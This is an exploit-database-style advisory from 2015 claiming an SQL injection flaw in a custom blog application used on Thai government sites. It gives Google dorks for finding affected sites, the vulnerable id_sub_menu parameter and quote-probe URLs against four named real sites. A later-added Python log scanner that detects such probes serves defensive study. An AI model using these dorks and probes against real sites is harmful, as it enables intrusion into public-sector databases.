
Thailand Gov Custom Blog WebApp SQL Injection

Author: Shelesh Rauthan, Published: 03-06-2015
=========================================================
[+] Title :- Thailand Gov Custom Blog WebApp SQL Injection
[+] Date :- 1 - June - 2015
[+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
[+] Team name :-
___________
\__ ___/___ _____ _____
| |_/ __ \\__ \ / \
| |\ ___/ / __ \| Y Y \
|____| \___ >____ /__|_| /
\/ \/ \/
_____ .__ __
/ _ \ | | _____ _______/ |_ ___________
/ /_\ \| | \__ \ / ___/\ __\/ _ \_ __ \
/ | \ |__/ __ \_\___ \ | | ( <_> ) | \/
\____|__ /____(____ /____ > |__| \____/|__|
\/ \/ \/
__________
\______ \_______ ____ ____ ________ ____
| | _/\_ __ \_/ __ \_/ __ \\___ // __ \
| | \ | | \/\ ___/\ ___/ / /\ ___/
|______ / |__| \___ >\___ >_____ \\___ >
\/ \/ \/ \/ \/
[+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R
[+] Greedz to :- @@lu, Lalit, MyLappy:3, Diksha
[+] Facebook :- fb.com/shelesh.rauthan
[+] Gmail.com :- indian.1337.hacker@gmail.com

=========================================================

[+] Dork site:go.th inurl:"id_sub_menu="

site:th inurl:"id_sub_menu="

=========================================================

[+] About :- A Thailand government authority is running a custom blog web application on major websites which is vulnerable to SQL injection!

SQL Vulnerable component (server file path) : /home/ABC/domains/DOMAIN.go.th/public_html/core_main/module/web/blog/blog.php

=========================================================

[+] Description :-

Search Google with the dorks given above and open any site from the results that has "web/blog&id_sub_menu=" present in the URL.
Note:- Replace the "&namemenu=" parameter at the end of the URL.
SQL Vulnerable Link: "DOMAIN.go.th/XXX/index.php?mod=blog&path=web/blog&id_sub_menu=102%27"


[+] Demo :-


http://www.sappha.moe.go.th/sappha/index.php?mod=blog&path=web/blog&id_sub_menu=102%27
http://www.sesao19.go.th/web/spm19/index.php?mod=blog&path=web/blog&id_sub_menu=59%27
http://www.chiangmaiarea6.go.th/cma/index.php?mod=blog&path=web/blog&id_sub_menu=45%27
http://thirdthai.ac.th/index.php?mod=blog&path=web/blog&id_sub_menu=48%27


=========================================================

Severity Level: [+] High

Request Method(s): [+] GET / POST

Vulnerable Parameter(s): [+] id_sub_menu, blog

Affected Area(s): [+] Entire admin, database, Server
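As an added defender-side example (not part of the advisory), the following Python script flags requests to the affected blog module whose id_sub_menu value is not a plain integer, which is the pattern of the %27 probe shown above, when run over web server access logs. The log lines are constructed; the module, path and parameter names are taken from the advisory.

```python
"""Flag id_sub_menu probes against the blog module in access logs (added example)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined-log request field: ip - - [timestamp] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Only this module/path combination is named as affected by the advisory.
AFFECTED_MOD = "blog"
AFFECTED_PATH = "web/blog"


def classify_target(target: str):
    """Return a reason string if the request looks like a probe, else None."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if query.get("mod", [""])[0] != AFFECTED_MOD:
        return None
    if query.get("path", [""])[0] != AFFECTED_PATH:
        return None
    for raw in query.get("id_sub_menu", []):
        # parse_qs decodes once; decode again to catch double-encoded %2527
        value = unquote(raw)
        if not re.fullmatch(r"\d+", value):
            return f"non-numeric id_sub_menu={value!r}"
    return None


def scan_log(lines):
    """Return a list of findings for log lines that carry a suspicious id_sub_menu."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined-log format
        reason = classify_target(m.group("target"))
        if reason:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "status": m.group("status"), "reason": reason})
    return findings


# Constructed sample log: benign request, quote probe, double-encoded probe, other module
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jun/2015:10:00:01 +0700] "GET /sappha/index.php?mod=blog&path=web/blog&id_sub_menu=102 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jun/2015:10:00:02 +0700] "GET /sappha/index.php?mod=blog&path=web/blog&id_sub_menu=102%27 HTTP/1.1" 500 312',
    '198.51.100.7 - - [01/Jun/2015:10:00:03 +0700] "GET /sappha/index.php?mod=blog&path=web/blog&id_sub_menu=102%2527 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jun/2015:10:00:04 +0700] "GET /sappha/index.php?mod=news&path=web/news&id_sub_menu=1%27 HTTP/1.1" 200 900',
]
```

The same integer check, applied server-side to id_sub_menu before it reaches the query (together with a parameterized statement), is the fix the application itself needs.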

===========================================================
